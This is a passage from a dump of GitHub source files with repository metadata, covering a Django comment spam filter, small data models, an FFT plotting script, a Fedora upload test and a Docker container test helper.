None\n\n def _akismet_spam_check(self):\n \"\"\"\n Checks the comment against the Akismet spam prevention web service. Returns \"spam\" if the\n comment is found to be spam, \"ham\" if the comment isn't found to be spam, and \"error\" if\n the check doesn't complete successfully.\n \"\"\"\n from akismet import Akismet, AkismetError\n import unicodedata\n akismet = Akismet(key=settings.AKISMET_API_KEY, blog_url=settings.AKISMET_SITE_URL, agent=settings.AKISMET_USER_AGENT)\n comment_data = {\n 'user_ip': self.author_ip_address,\n 'user_agent': self.author_user_agent_string,\n 'comment_author': unicodedata.normalize('NFKD', self.author_name).encode('ascii','ignore'),\n 'comment_author_email': self.author_email_address,\n 'comment_author_url': self.author_url,\n }\n try:\n # Pass the comment through Akisment and find out if it thinks it's spam.\n is_spam = akismet.comment_check(comment=unicodedata.normalize('NFKD', unicode(self.body)).encode('ascii','ignore'), data=comment_data)\n if is_spam == True:\n return \"spam\"\n elif is_spam == False:\n return \"ham\"\n except AkismetError:\n pass\n return \"error\"\n \n def _is_whitelisted(self):\n \"\"\"\n Returns True is the comment matches our whitelist.\n \"\"\"\n try:\n item = EmailWhitelistItem.objects.get(email_address=self.author_email_address)\n return True\n except:\n return False\n \n def _is_blacklisted(self):\n \"\"\"\n Returns True is the comment matches one of our blacklists.\n \"\"\"\n blacklisted = False\n if NameBlacklistItem.objects.all().count() != 0:\n for item in NameBlacklistItem.objects.all():\n if item.name in self.author_name:\n return True\n if EmailBlacklistItem.objects.all().count() != 0:\n for item in EmailBlacklistItem.objects.all():\n if item.email_address in self.author_email_address:\n return True\n if URLBlacklistItem.objects.all().count() != 0:\n for item in URLBlacklistItem.objects.all():\n if item.url in self.author_url:\n return True\n if IPBlacklistItem.objects.all().count() != 0:\n for item in IPBlacklistItem.objects.all():\n if item.ip_address in self.author_ip_address:\n return True\n return blacklisted\n \n def _spam_check(self):\n \"\"\"\n Checks the comment for spam and other undesirables.\n \"\"\"\n # Set all the possible flags to False upfront.\n delete_me = is_spam = whitelisted = blacklisted = akismet_error = approved = False\n \n # Next, see if Akismet will sign off on the comment.\n akismet_result = self._akismet_spam_check()\n if akismet_result == \"spam\":\n # If Akismet reports the comment is spam, mark it for deletion.\n is_spam = True\n delete_me = True\n elif akismet_result == \"ham\":\n # If it's ham, approve it.\n approved = True\n elif akismet_result == \"error\":\n # If there was some error in the Akismet-checking process, unapprove the comment\n # and flag it for notification later.\n akismet_error = True\n \n # If we fail local spam checks, unapprove and delete the comment.\n if self._is_blacklisted() == True:\n approved = False\n delete_me = True\n blacklisted = True\n \n # If the e-mail is in our whitelist, approve and save the message, even despite any other\n # checks which may have raised flags.\n if self._is_whitelisted():\n approved = True\n whitelisted = True\n blacklisted = False\n delete_me = False\n is_spam = False\n \n results = {\n 'delete': delete_me,\n 'blacklisted': blacklisted,\n 'whitelisted': whitelisted,\n 'approved': approved,\n 'akismet_spam': is_spam,\n 'akismet_error': akismet_error,\n }\n \n return results\n \n def save(self, force_insert=False, force_update=False):\n # Figure out which content item (blog post, link, etc.) we're dealing with.\n content_object = self.content_object\n \n if self.completed_spam_check:\n # If passed_spam_check is Ture, then this is an old comment and we're probably editing in the admin.\n # Therefore, changes are authoritative, and we don't need to go through all the comment spam measures.\n super(Comment, self).save()\n else:\n # If passed_spam_check is False, we need to run akismet and test aganist our blacklists.\n # We only do this once.\n spam_check = self._spam_check()\n self.completed_spam_check = True\n \n # If the message isn't marked for deletion, save the comment\n if not spam_check['delete']:\n self.approved = spam_check['approved']\n self.whitelisted = spam_check['whitelisted']\n self.blacklisted = spam_check['blacklisted']\n self.passed_akismet = spam_check['akismet_spam']\n self.author_email_address_hash = md5.new(self.author_email_address).hexdigest()\n super(Comment, self).save(force_insert=force_insert, force_update=force_update)\n else:\n # If the message is marked for deletion, don't save it.\n return\n \n class Meta:\n ordering = ('-date_submitted',)\n get_latest_by = 'date_submitted'\n\n\nclass FlickrComment(models.Model):\n \"\"\"A FlickrComment keeps comments left on Flickr. It hangs off the Comment model, storing Flickr-specific metadata.\"\"\"\n comment = models.ForeignKey(Comment)\n flickr_comment_id = models.CharField(blank=True, max_length=200)\n author = models.ForeignKey(FlickrUser)\n url = models.URLField(blank=True, verify_exists=True)\n\n def __str__(self):\n return \"FlickrComment\"\n","repo_name":"ipmb/97bottles","sub_path":"libs/savoy/contrib/comments/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72643876576","text":"# coding: utf-8\n\nfrom django import forms\nfrom django.utils.encoding import force_str\nfrom django.utils.translation import gettext_lazy as _\n\nM = _('Hold down \"Control\", or \"Command\" on a Mac, to select more than one.')\n\n\nclass FixedModelForm(forms.ModelForm):\n \"\"\"\n Simple child of ModelForm that removes the 'Hold down \"Control\" ...'\n message that is enforced in select multiple fields.\n\n See https://github.com/asyncee/django-easy-select2/issues/2\n and https://code.djangoproject.com/ticket/9321\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(FixedModelForm, self).__init__(*args, **kwargs)\n\n msg = force_str(M)\n\n for name, field in self.fields.items():\n field.help_text = field.help_text.replace(msg, '')\n","repo_name":"asyncee/django-easy-select2","sub_path":"easy_select2/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":212,"dataset":"github-code","pt":"34"} +{"seq_id":"42317442541","text":"from src.Resident import Resident\n\nresident = Resident()\n\n\nclass Apartment:\n\n def __init__(self):\n self.residents = []\n self.floor = 0\n self.door = 0\n self.type = \"\"\n\n def insertApartment(self):\n # si no hay ninguno pide introducir al menos un residente:\n # si ya hay alguno, pregunta si quiere meter más:\n if len(self.residents) == 0:\n resident.insertResident()\n self.residents.append(resident)\n self.askMoreResidents()\n self.introInformationInApartment(\"floor\")\n self.introInformationInApartment(\"door\")\n self.introInformationInApartment(\"type\")\n\n def introInformationInApartment(self, word):\n print(word)\n setattr(self, word, input())\n\n def askMoreResidents(self):\n\n try:\n while True:\n user_selection = int(\n input(\"If do you want introduce an other resident press 1 for continue or 0 for continue:\"))\n if user_selection == 1:\n resident.insertResident()\n self.residents.append(resident)\n if user_selection == 0:\n break\n except ValueError:\n print(\"Please enter only numbers!\")\n\n\n def showInfoApartment(self):\n for resident in self.residents:\n resident.showInfoResident()\n print(f\"floor: {self.floor} , door: {self.door} , type: {self.type}\")","repo_name":"saidaHF/BuildingManagement","sub_path":"src/Apartment.py","file_name":"Apartment.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13839286788","text":"from ..extensions import db\n\n# Usuario\n# tabela que contem as configurações do usuário\n# id => chave primária\n# nome => nome completo do usuário\n# cpf => CPF do usuário\n# email => email do usuário\n# telefone => telefone residencial ou celular do usuário\n# endereço => endereço completo do usuário: rua, número, complemento etc.\n\nclass Usuario(db.Model):\n __tablename__ = 'usuario'\n id = db.Column(db.Integer, primary_key = True)\n nome = db.Column(db.String(30), nullable = False)\n cpf = db.Column(db.Integer, unique = True, nullable = False)\n email = db.Column(db.String(50), unique = True, nullable = False)\n telefone = db.Column(db.Integer, nullable = False)\n endereço = db.Column(db.String(30), nullable = False)\n\n # carrinho(one) <-> usuario(one)\n carrinho = db.relationship(\"carrinho\", back_populates=\"usuario\", uselist=False)\n\n # pedidos(many) <-> usuario(one)\n pedido = db.relationship('Pedidos', backref = 'pedido_usuario')\n\n # cupons(many) <-> usuario(one)\n cupom = db.relationship('Cupons', backref = 'cupons_usuario')\n\n def json(self):\n return{\n 'nome':self.nome,\n 'cpf':self.cpf,\n 'email':self.email,\n 'telefone':self.telefone,\n 'endereço':self.endereço\n }\n\n","repo_name":"karenarcoverde/automoveis-fluxo","sub_path":"app/usuario/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35485633404","text":"'Boundary definitions for letters'\n\nfrom math import pi, tan\n\ny_lim, width = 5, 1\nleft_end, right_end = -3.5, 3.5\n\ndef get_xy(point):\n\n x, y = point\n assert isinstance(x, float) and isinstance(y, float)\n\n return x, y\n\ndef assert_A(point, slope=10/3):\n\n x, y = get_xy(point)\n\n inside_outer_left_arm = lambda x, y: y + y_lim <= slope * (x - left_end) \n inside_outer_right_arm = lambda x, y: y + y_lim <= -slope * (x - right_end) \n outside_inner_left_arm = lambda x, y: y + y_lim >= slope * (x - (left_end+width)) \n outside_inner_right_arm = lambda x, y: y + y_lim >= -slope * (x - (right_end-width)) \n\n return (-width <= y <= 0 or y_lim-width <= y <= y_lim) and (inside_outer_left_arm(x, y) and inside_outer_right_arm(x, y)) \\\n or (-y_lim <= y <= -width or 0 <= y <= y_lim-width) and (inside_outer_left_arm(x, y) and outside_inner_left_arm(x, y) or inside_outer_right_arm(x, y) and outside_inner_right_arm(x, y))\n\ndef assert_B(point):\n\n x, y = get_xy(point)\n\n curve_left_end = left_end + width\n outer_major_axis = right_end - curve_left_end\n outer_minor_axis = y_lim / 2\n inner_major_axis = outer_major_axis - width \n inner_minor_axis = outer_minor_axis - width\n\n inside_upper_outer_curve = lambda x, y: outer_minor_axis**2 * (x-curve_left_end)**2 + outer_major_axis**2 * (y-outer_minor_axis)**2 <= outer_minor_axis**2 * outer_major_axis**2 \n inside_lower_outer_curve = lambda x, y: outer_minor_axis**2 * (x-curve_left_end)**2 + outer_major_axis**2 * (y+outer_minor_axis)**2 <= outer_minor_axis**2 * outer_major_axis**2 \n outside_upper_inner_curve = lambda x, y: inner_minor_axis**2 * (x-curve_left_end)**2 + inner_major_axis**2 * (y-outer_minor_axis)**2 >= inner_minor_axis**2 * inner_major_axis**2 \n outside_lower_inner_curve = lambda x, y: inner_minor_axis**2 * (x-curve_left_end)**2 + inner_major_axis**2 * (y+outer_minor_axis)**2 >= inner_minor_axis**2 * inner_major_axis**2 \n\n return (-outer_minor_axis <= y-outer_minor_axis <= outer_minor_axis or -outer_minor_axis <= y+outer_minor_axis <= outer_minor_axis) and (left_end <= x <= left_end+width) or \\\n left_end+width <= x <= right_end and (inside_upper_outer_curve(x, y) and outside_upper_inner_curve(x, y) or inside_lower_outer_curve(x, y) and outside_lower_inner_curve(x, y))\n\ndef assert_C(point, center=1, theta=pi/3):\n\n x, y = get_xy(point)\n\n return (x-center)**2 + y**2 <= y_lim**2 \\\n and (x-center)**2 + y**2 >= (y_lim-1)**2 \\\n and (x <= 0 or abs(y/(x-center)) >= tan(theta))\n\ndef assert_D(point):\n\n x, y = get_xy(point)\n\n curve_left_end = left_end + width\n outer_major_axis = right_end - curve_left_end\n outer_minor_axis = y_lim\n inner_major_axis = outer_major_axis - width \n inner_minor_axis = outer_minor_axis - width\n\n inside_outer_curve = lambda x, y: outer_minor_axis**2 * (x-curve_left_end)**2 + outer_major_axis**2 * y**2 <= outer_minor_axis**2 * outer_major_axis**2 \n outside_inner_curve = lambda x, y: inner_minor_axis**2 * (x-curve_left_end)**2 + inner_major_axis**2 * y**2 >= inner_minor_axis**2 * inner_major_axis**2\n\n return (-outer_minor_axis <= y <= outer_major_axis) and (left_end <= x <= left_end+width or \\\n left_end+width <= x <= right_end and inside_outer_curve(x, y) and outside_inner_curve(x, y))\n\ndef assert_E(point):\n\n x, y = get_xy(point)\n\n ...\n\nassert_funcs = {\n 'A': assert_A,\n 'B': assert_B,\n 'C': assert_C,\n 'D': assert_D,\n # 'E': assert_E,\n # 'F': assert_F,\n # 'G': assert_G,\n # 'H': assert_H,\n # 'I': assert_I,\n # 'J': assert_J,\n # 'K': assert_K,\n # 'L': assert_L,\n # 'M': assert_M,\n # 'N': assert_N,\n # 'O': assert_O,\n # 'P': assert_P,\n # 'Q': assert_Q,\n # 'R': assert_R,\n # 'S': assert_S,\n # 'T': assert_T,\n # 'U': assert_U,\n # 'V': assert_V,\n # 'W': assert_W,\n # 'X': assert_X,\n # 'Y': assert_Y,\n # 'Z': assert_Z\n}\n\n\nif __name__ == '__main__':\n\n import argparse\n import sys\n import numpy as np\n import matplotlib.pyplot as plt\n\n parser = argparse.ArgumentParser(description=__doc__.strip().split('\\n')[0], add_help=False)\n parser.add_argument('letter', type=str)\n args = parser.parse_args()\n\n letter = args.letter.upper()\n assert_func = assert_funcs[letter]\n\n sample_size = 10_000\n sample = np.random.uniform(-y_lim, y_lim, (sample_size, 2)).tolist()\n sample = [point for point in sample if assert_func(point)]\n\n plt.scatter(*zip(*sample))\n plt.xlim(-y_lim, y_lim)\n plt.ylim(-y_lim, y_lim)\n plt.show()","repo_name":"ignasa007/Random","sub_path":"100-days-of-code/day6-day9_noise/assertions.py","file_name":"assertions.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32352428912","text":"#!/usr/bin/env python\n\n# Script for testing upload a file to Fedora to get an upload id for use as\n# a datastream location.\n# Example of using a callback method on the upload api call.\n# Requires progressbar\n\nimport argparse\nimport base64\nimport os\nimport progressbar\nimport pycurl\n\nfrom eulfedora.server import Repository\nfrom eulfedora.util import force_bytes, force_text\nfrom test import testsettings\n\n\ndef upload_file(filename):\n repo = Repository(testsettings.FEDORA_ROOT_NONSSL, testsettings.FEDORA_USER,\n testsettings.FEDORA_PASSWORD)\n\n filesize = os.path.getsize(filename)\n widgets = ['Upload: ', progressbar.widgets.Percentage(), ' ',\n progressbar.widgets.Bar(), ' ', progressbar.widgets.ETA(),\n ' ', progressbar.widgets.FileTransferSpeed()]\n # set initial progressbar size based on file; will be slightly larger because\n # of multipart boundary content\n pbar = progressbar.ProgressBar(widgets=widgets, maxval=filesize).start()\n\n def upload_callback(monitor):\n # update the progressbar to actual maxval (content + boundary)\n pbar.max_value = monitor.len\n # update current status\n pbar.update(monitor.bytes_read)\n\n with open(filename, 'rb') as f:\n upload_id = repo.api.upload(f, callback=upload_callback)\n pbar.finish()\n print(upload_id)\n\n\ndef curl_upload_file(filename):\n print('curl upload')\n conn = pycurl.Curl()\n auth = base64.b64encode(force_bytes(\"%s:%s\" % (testsettings.FEDORA_USER, testsettings.FEDORA_PASSWORD)))\n headers = {'Authorization' : 'Basic %s' % force_text(auth)}\n conn.setopt(conn.URL, '%supload' % testsettings.FEDORA_ROOT_NONSSL)\n conn.setopt(pycurl.VERBOSE, 1)\n conn.setopt(pycurl.HTTPHEADER, [\"%s: %s\" % t for t in headers.items()])\n\n filesize = os.path.getsize(filename)\n widgets = ['Upload: ', progressbar.widgets.Percentage(), ' ',\n progressbar.widgets.Bar(), ' ', progressbar.widgets.ETA(),\n ' ', progressbar.widgets.FileTransferSpeed()]\n # set initial progressbar size based on file; will be slightly larger because\n # of multipart boundary content\n pbar = progressbar.ProgressBar(widgets=widgets, maxval=filesize).start()\n\n def progress(dl_total, dl, up_total, up):\n # update the progressbar to actual maxval (content + boundary)\n pbar.max_value = up_total\n # update current status\n pbar.update(up)\n\n conn.setopt(conn.HTTPPOST, [\n ('file', (\n # upload the contents of this file\n conn.FORM_FILE, filename,\n # specify a different file name for the upload\n conn.FORM_FILENAME, 'file',\n # specify a different content type\n # conn.FORM_CONTENTTYPE, 'application/x-python',\n )),\n ])\n # conn.setopt(conn.CURLOPT_READFUNCTION)\n conn.setopt(conn.XFERINFOFUNCTION, progress)\n conn.setopt(conn.NOPROGRESS, False)\n\n conn.perform()\n\n # HTTP response code, e.g. 200.\n print('Status: %d' % conn.getinfo(conn.RESPONSE_CODE))\n # Elapsed time for the transfer.\n print('Time: %f' % conn.getinfo(conn.TOTAL_TIME))\n\n conn.close()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Upload a file to fedora for use as datastream content')\n parser.add_argument('filename', metavar='FILE',\n help='name of the file to upload')\n parser.add_argument('--curl', action='store_true',\n help='upload with pycurl')\n\n args = parser.parse_args()\n if args.curl:\n curl_upload_file(args.filename)\n else:\n upload_file(args.filename)","repo_name":"emory-libraries/eulfedora","sub_path":"scripts/upload-test.py","file_name":"upload-test.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"34"} +{"seq_id":"29561484063","text":"#!/usr/bin/python\nimport wave\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport peakutils\n\n#Need to get (x,y) coordinates of a DFFT from a wave sample. @matth3wology\n\n#Import wav file to matplot Frequency Domain\nm = wave.open(\"440.wav\",\"r\")\n\n#Convert wav to numpy matrix\nframes = m.readframes(-1)\nframes = np.fromstring(frames,\"Int16\")\n\nchannels = [[] for channel in range(m.getnchannels())]\n\n#Checking the number of channels to take both Mono and Stereo\nfor a,b in enumerate(frames):\n channels[a%len(channels)].append(b)\n\n#Setup (x,y)\nsignal = channels[0]\nN = len(signal)\nfft = np.fft.fft(signal)\ny = 2.0/N * np.abs(fft[:N//2])\nx = np.linspace(0.0,m.getframerate()/2.0,N/2)\n\n#Find peaks\npeaks = peakutils.indexes(y, thres=0.05, min_dist=10)\nx_peak=x[peaks]\ny_peak=y[peaks]\n\n#Plot\nplt.plot(x,y)\nplt.plot(x_peak,y_peak,'rd')\n\n#Show the plot\nplt.show()\n","repo_name":"matth3wology/audio_test","sub_path":"fft_plot_peaks.py","file_name":"fft_plot_peaks.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35559164554","text":"import logging\nimport os\nimport re\nimport time\nfrom enum import Enum\nfrom typing import List, Tuple, Dict\n\nimport docker\nfrom docker import APIClient\nimport json\nfrom pythoncommons.file_utils import FileUtils\nfrom pythoncommons.process import SubprocessCommandRunner\nfrom pythoncommons.string_utils import auto_str\n\nDEFAULT_DOCKERFILE_NAME = \"Dockerfile\"\n\nLOG = logging.getLogger(__name__)\n\n\nclass DockerWrapper:\n client = APIClient(base_url=\"unix://var/run/docker.sock\")\n\n def __init__(self):\n pass\n\n @classmethod\n def create_image_from_dir(cls, dockerfile_parent_dir_path, tag=None, build_args=None):\n cls._build_image_internal(dockerfile_parent_dir_path, tag=tag, build_args=build_args)\n\n @classmethod\n def create_image_from_dockerfile(cls, dockerfile_name, tag=None, build_args=None):\n dockerfile_parent_dir_path = os.path.dirname(dockerfile_name)\n\n # Example: dockerfile_name = \"Dockerfile\" --> Path would be empty\n if not dockerfile_parent_dir_path:\n dockerfile_parent_dir_path = os.getcwd()\n dockerfile_name = os.path.basename(dockerfile_name)\n cls._build_image_internal(\n dockerfile_parent_dir_path, dockerfile_name=dockerfile_name, tag=tag, build_args=build_args\n )\n\n @classmethod\n def _build_image_internal(\n cls, dockerfile_parent_dir_path, dockerfile_name=DEFAULT_DOCKERFILE_NAME, tag=None, build_args=None\n ):\n if not build_args:\n build_args = {}\n LOG.info(\n \"Starting to build Docker image from Dockerfile: %s, based on parent dir path: %s\",\n dockerfile_name,\n dockerfile_parent_dir_path,\n )\n cls._fix_path_for_macos()\n response = [\n line\n for line in cls.client.build(\n path=dockerfile_parent_dir_path,\n dockerfile=dockerfile_name,\n rm=True,\n tag=tag,\n buildargs=build_args,\n network_mode=\"host\",\n )\n ]\n errors = cls.log_response(response)\n if errors:\n raise ValueError(\n f\"Failed to build Docker image from Dockerfile: {dockerfile_name}. \" f\"Error messages: {errors}\"\n )\n\n @classmethod\n def _fix_path_for_macos(cls):\n # NOTE: To avoid docker.credentials.errors.InitializationError: docker-credential-osxkeychain\n # not installed or not available in PATH.\n # --> Must add /usr/local/bin/ to PATH on macosx platform\n current_path = os.environ[\"PATH\"]\n if \"/usr/local/bin\" not in current_path:\n os.environ[\"PATH\"] = current_path + \":/usr/local/bin\"\n\n @classmethod\n def run_container(cls, image, volumes, sleep=300):\n client = docker.client.from_env()\n container = client.containers.run(image, \"sleep {}\".format(sleep), stderr=True, detach=True, volumes=volumes)\n return container\n\n @classmethod\n def inspect_container(cls, container_id: str):\n return docker.client.inspect_container(container_id)\n\n @classmethod\n def log_response(cls, response):\n errors = []\n for r in response:\n lines = r.decode().split(\"\\r\\n\")\n for line in lines:\n if line:\n line_dict = json.loads(line)\n log_value = line_dict[\"stream\"] if \"stream\" in line_dict else None\n err_detail = line_dict[\"errorDetail\"] if \"errorDetail\" in line_dict else None\n if err_detail:\n err_message = err_detail[\"message\"]\n errors.append(err_message)\n LOG.error(\"[BUILD] %s\", err_message)\n if log_value and \"ERROR\" in log_value:\n errors.append(log_value)\n if log_value and (log_value != \"\\n\"):\n LOG.info(\"[BUILD] %s\", log_value)\n return errors\n\n\nclass DockerMountMode(Enum):\n READ_WRITE = \"rw\"\n READ_ONLY = \"ro\"\n\n\n@auto_str\nclass DockerMount:\n def __init__(self, host_dir, container_dir, mode=DockerMountMode.READ_WRITE):\n self.host_dir = host_dir\n self.container_dir = container_dir\n self.mode = mode\n\n\nclass DockerDiagnosticStdoutAssertionMode(Enum):\n EXACT_MATCH = \"exact_match\"\n SUBSTRING_MATCH = \"substring_match\"\n\n\nclass DockerDiagnosticPhase(Enum):\n PRE = \"pre\"\n POST = \"post\"\n\n\n@auto_str\nclass DockerDiagnosticCommand:\n def __init__(\n self,\n mode,\n phase,\n command,\n expected_exit_code=0,\n expected_output=None,\n expected_output_fragments=None,\n strip=False,\n ):\n self.phase = phase\n self.mode = mode\n self.command = command\n self.expected_exit_code = expected_exit_code\n self.expected_output = expected_output\n self.expected_output_fragments = expected_output_fragments\n self.strip = strip\n\n @classmethod\n def create_exact_match(cls, phase, command, expected_output, expected_exit_code=0, strip=False):\n return cls(\n DockerDiagnosticStdoutAssertionMode.EXACT_MATCH,\n phase,\n command,\n expected_exit_code=expected_exit_code,\n expected_output=expected_output,\n strip=strip,\n )\n\n @classmethod\n def create_substring_match(cls, phase, command, expected_output_fragments, expected_exit_code=0, strip=False):\n return cls(\n DockerDiagnosticStdoutAssertionMode.SUBSTRING_MATCH,\n phase,\n command,\n expected_exit_code=expected_exit_code,\n expected_output_fragments=expected_output_fragments,\n strip=strip,\n )\n\n\nclass CreatePathMode(Enum):\n FULL_PATH = \"FULL_PATH\"\n PARENT_PATH = \"PARENT_PATH\"\n\n\nclass DockerTestSetup:\n def __init__(self, image_name, create_image=False, dockerfile_parent_dir_path=None, dockerfile=None, logger=None):\n self.image_name = image_name\n if create_image:\n if dockerfile_parent_dir_path:\n self.create_image(dockerfile_parent_dir_path=dockerfile_parent_dir_path)\n elif dockerfile:\n DockerWrapper.create_image_from_dockerfile(dockerfile, tag=self.image_name)\n\n if logger:\n self.CMD_LOG = logger\n else:\n self.CMD_LOG = LOG\n\n # Assigned later\n self._reinit()\n\n def _reinit(self):\n self.pre_diagnostics: List[DockerDiagnosticCommand] = []\n self.post_diagnostics: List[DockerDiagnosticCommand] = []\n self.test_instance = None\n self.mounts: List[DockerMount] = []\n self.container = None\n\n def cleanup(self):\n self._reinit()\n\n def create_image(self, dockerfile_parent_dir_path=None):\n if not dockerfile_parent_dir_path:\n dockerfile_parent_dir_path = os.getcwd()\n LOG.warning(\n f\"Dockerfile location was not specified. \"\n f\"Trying to create image from current working directory: {dockerfile_parent_dir_path}\"\n )\n DockerWrapper.create_image_from_dir(dockerfile_parent_dir_path, tag=self.image_name)\n\n def mount_dir(self, host_dir, container_dir, mode=DockerMountMode.READ_WRITE):\n self.mounts.append(DockerMount(host_dir, container_dir, mode=mode))\n\n def apply_mounts(self, docker_mounts: List[DockerMount]):\n self.mounts.extend(docker_mounts)\n\n def print_mounts(self):\n LOG.info(\"Docker mounts: %s\", self.mounts)\n\n def add_diagnostics(self, diags: List[DockerDiagnosticCommand]):\n for diag in diags:\n if diag.phase == DockerDiagnosticPhase.PRE:\n self.pre_diagnostics.append(diag)\n elif diag.phase == DockerDiagnosticPhase.POST:\n self.post_diagnostics.append(diag)\n\n def run_container(self, commands_to_run: List[str] = None, sleep=300):\n if not commands_to_run:\n commands_to_run = []\n\n volumes_dict = self._create_volumes_dict()\n LOG.info(f\"Starting container from image '{self.image_name}' with volumes: '{volumes_dict}'\")\n self.container = DockerWrapper.run_container(image=self.image_name, volumes=volumes_dict, sleep=sleep)\n\n if self.pre_diagnostics:\n self._run_pre_diagnostic_commands()\n\n for cmd in commands_to_run:\n self.exec_cmd_in_container(cmd)\n\n if self.post_diagnostics:\n self._run_post_diagnostic_commands()\n return self.container\n\n def _create_volumes_dict(self):\n # Convert DockerMount objects to volumes dictionary\n volumes_dict = {}\n for mount in self.mounts:\n volumes_dict[mount.host_dir] = {\"bind\": mount.container_dir, \"mode\": mount.mode.value}\n return volumes_dict\n\n def _run_pre_diagnostic_commands(self):\n self._run_diagnostic_command(DockerDiagnosticPhase.PRE)\n\n def _run_post_diagnostic_commands(self):\n self._run_diagnostic_command(DockerDiagnosticPhase.POST)\n\n def _run_diagnostic_command(self, phase):\n diag_command_objs: List[DockerDiagnosticCommand] = (\n self.pre_diagnostics if phase == DockerDiagnosticPhase.PRE else self.post_diagnostics\n )\n LOG.debug(\"Running diagnostic commands in '%s' phase: %s\", phase.value, diag_command_objs)\n for diag in diag_command_objs:\n if diag.mode == DockerDiagnosticStdoutAssertionMode.EXACT_MATCH:\n self.exec_diagnostic_command(diag)\n elif diag.mode == DockerDiagnosticStdoutAssertionMode.SUBSTRING_MATCH:\n self.exec_command_and_grep_in_stdout(diag)\n\n def exec_diagnostic_command(self, diag: DockerDiagnosticCommand):\n # TODO Seems like stdout is not returned anymore :(\n exit_code, stdout = self.exec_cmd_in_container(diag.command, strip=diag.strip)\n self.test_instance.assertEqual(\n diag.expected_exit_code,\n exit_code,\n msg=\"Exit code of command is not the expected. \" f\"Command details: {diag}\",\n )\n if diag.strip:\n diag.expected_output = diag.expected_output.strip()\n self.test_instance.assertEqual(\n diag.expected_output, stdout, msg=\"Stdout of command is not the expected. \" f\"Command details: {diag}\"\n )\n\n def exec_command_and_grep_in_stdout(self, diag: DockerDiagnosticCommand):\n # TODO Seems like stdout is not returned anymore :(\n exit_code, stdout = self.exec_cmd_in_container(diag.command, strip=diag.strip)\n self.test_instance.assertEqual(\n diag.expected_exit_code,\n exit_code,\n msg=\"Exit code of command is not the expected.\" f\"Command details: {diag}\",\n )\n\n for fragment in diag.expected_output_fragments:\n self.test_instance.assertTrue(\n fragment in stdout,\n msg=\"Cannot find expected fragment in stdout. \"\n f\"Fragment: {fragment}, stdout: {stdout}, Command details: '{diag}'\",\n )\n\n def generate_dummy_text_files_in_container_dirs(self, dir_and_no_of_files: List[Tuple[str, int]]):\n for dir_files in dir_and_no_of_files:\n self._generate_dummy_text_files_in_container_dir(dir_files[0], dir_files[1])\n\n def _generate_dummy_text_files_in_container_dir(self, dir_path: str, number_of_files: int):\n self.exec_cmd_in_container(\"mkdir -p \" + dir_path)\n for i in range(number_of_files):\n path = os.path.normpath(dir_path)\n path_segments = path.split(os.sep)\n path_segments = list(filter(None, path_segments))\n file_name = \"_\".join(path_segments) + \"_\" + str(i + 1)\n file_path = FileUtils.join_path(dir_path, file_name)\n cmd = f\"echo dummy_{str(i + 1)} > {file_path}\"\n # Simple redirect did not work: self._exec_cmd_in_container(cmd)\n # See: https://github.com/docker/docker-py/issues/1637\n # Use this as a workaround\n self.exec_cmd_in_container([\"sh\", \"-c\", cmd])\n\n def exec_cmd_in_container(\n self,\n cmd,\n charset=\"utf-8\",\n strip=True,\n fail_on_error=True,\n stdin=False,\n tty=False,\n env: Dict[str, str] = None,\n detach=False,\n callback=None,\n stream=False,\n strict: bool = True,\n ):\n if not env:\n env = {}\n if strict:\n if not stream and callback:\n raise ValueError(\n \"Callback is specified but streaming mode is not enabled! Callback only makes sense if streaming mode is active!\"\n )\n\n # https://stackoverflow.com/questions/29663459/python-app-does-not-print-anything-when-running-detached-in-docker\n env[\"PYTHONUNBUFFERED\"] = \"1\"\n LOG.info(f\"Running command '{cmd}' in container: '{self.container}'\")\n exec_handler = DockerWrapper.client.exec_create(self.container.id, cmd, environment=env, stdin=stdin, tty=tty)\n ret = DockerWrapper.client.exec_start(exec_handler, stream=stream, detach=detach)\n\n # If stream=True, the execution will stay in _get_output_of_cmd until there's data to read from the output.\n # This means that when the loop that reads the output ends, the process is finished.\n # Therefore, handle stream mode separately.\n if not stream:\n self._get_and_verify_exit_code(callback, charset, cmd, exec_handler, fail_on_error, ret, stream, strip)\n\n if detach:\n exit_code: int = self._get_exit_code(cmd, exec_handler, stream)\n return exit_code, None\n\n decoded_stdout = self._get_output_of_cmd(cmd, ret, callback, charset, strip, stream)\n exit_code = self._get_and_verify_exit_code(\n callback, charset, cmd, exec_handler, fail_on_error, ret, stream, strip\n )\n return exit_code, decoded_stdout\n\n def _get_and_verify_exit_code(self, callback, charset, cmd, exec_handler, fail_on_error, ret, stream, strip):\n exit_code: int = self._get_exit_code(cmd, exec_handler, stream)\n if fail_on_error and exit_code != 0:\n _ = self._get_output_of_cmd(cmd, ret, callback, charset, strip, stream)\n raise ValueError(\n f\"Command '{cmd}' returned with non-zero exit code: {exit_code}. See logs above for more details.\"\n )\n return exit_code\n\n def _get_output_of_cmd(self, cmd, ret, callback, charset, strip, stream):\n LOG.info(f\"Listing stdout of cmd: {cmd}...\")\n short_cmd = os.path.basename(cmd).rstrip()\n decoded_stdout = None\n\n if not stream:\n if ret:\n decoded_stdout = ret.decode(charset)\n if strip:\n decoded_stdout = decoded_stdout.strip()\n self.CMD_LOG.info(f\"[{short_cmd}] {decoded_stdout}\")\n return decoded_stdout\n else:\n LOG.warning(\"Output was None\")\n return None\n\n for output in ret:\n try:\n decoded_stdout = output.decode(charset)\n if strip:\n decoded_stdout = decoded_stdout.strip()\n self.CMD_LOG.info(f\"[{short_cmd}] {decoded_stdout}\")\n if callback:\n 